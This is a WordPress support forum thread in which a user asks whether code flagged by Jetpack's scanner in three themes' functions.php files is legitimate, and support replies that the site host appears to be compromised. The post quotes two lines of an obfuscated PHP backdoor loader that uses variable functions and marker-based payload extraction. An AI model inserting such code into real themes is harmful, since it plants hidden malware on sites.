malicious code

[adVETsity]

Can someone help me with this? Received a total of three. Is that code legit? It was a part of the zip file.
The file functions.php contains a malicious code pattern
Threat found (php_suspicious_variable_function_005)
More
What was the problem?

Jetpack found a code pattern that is commonly present on known malicious code. This signature will flag any suspicious usage of PHP’s Variable functions. The code in these files needs to be reviewed, and possibly cleaned.

The technical details

Threat found in file:

/home1//public_html/wp-content/themes/skeleton-reworked/functions.php
41
42
43

$reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

[Shri S]

Skeleton theme is not part of SKT Themes so not sure why you post some other theme issues here?

Regards,
Shri

[adVETsity]

Here you go. I received three threats from Jetpack. The theme I installed was the skt-finance. Below are the three threats.

/home1//public_html/wp-content/themes/skt-finance/functions.php
41
42
43

$reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

/home1//public_html/wp-content/themes/sinatra/functions.php
41
42
43

$reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

/home1//public_html/wp-content/themes/skeleton-reworked/functions.php
41
42
43

$reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

[Shri S]

When it’s giving errors for all function files of all themes then the hosting itself has got malware and have been hacked probably.

The code does not exist in our theme by default. You yourself have posted sinatra and skeleton themes function files as well.

Please ask hosting to resolve and then use wordfence etc to clean up. It might have also affected database as well.

Regards,
Shri

[Author]

Posts